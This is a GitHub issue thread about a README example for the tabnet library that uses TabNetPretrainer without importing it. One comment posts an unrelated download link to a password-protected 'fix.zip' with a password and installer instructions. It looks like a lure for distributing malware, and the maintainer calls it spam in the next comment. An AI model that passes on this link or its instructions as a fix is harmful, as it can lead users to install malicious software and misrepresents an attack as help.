### ISSUE TITLE
TabNetPretrainer is used without imported in README

### ISSUE THREAD

**Issue by seven320** [dreamquark-ai/tabnet#553]
**Describe the bug**
in README `TabNetPretrainer` is used without import 

**What is the current behavior?**

**If the current behavior is a bug, please provide the steps to reproduce.**

**Expected behavior**

**Screenshots**

**Other relevant information:**
poetry version:  
python version: 
Operating System: 
Additional tools:

**Additional context**

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Optimox** [comment]
I consider this a spam, please do not reopen.
